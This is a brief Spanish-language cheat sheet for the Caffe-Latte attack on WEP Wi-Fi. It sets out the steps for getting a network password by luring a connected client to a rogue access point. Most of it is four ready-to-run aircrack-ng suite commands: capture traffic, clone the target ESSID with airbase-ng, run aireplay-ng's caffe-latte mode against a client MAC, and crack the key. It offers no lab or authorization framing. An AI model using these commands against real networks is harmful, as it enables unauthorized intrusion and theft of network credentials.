Caffe-Latte Attack

Ataque usado para la obtención de contraseña. Se engaña un cliente conectado a un AP para que se conecte a uno falso, forzándolo a enviar suficiente tráfico con IVs como para descifrar la contraseña.


  • Capturar tráfico con Airodump-ng

sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
  • Crear AP falso con Airbase-ng, reemplazando el nombre del AP falso por el del AP objetivo

sudo airbase-ng --essid "nombre_AP_objetivo" -c <channel_AP> <wifi_interface>
  • Ejecutar ataque caffe-latte con Aireplay-ng

sudo aireplay-ng --caffe-latte -h <MAC_cliente_objetivo> <wifi_interface>
  • Crackear contraseña con Aircrack-ng desde fichero con tráfico capturado en Airodump-ng

sudo aircrack-ng –b <MAC_AP> traffic_file.cap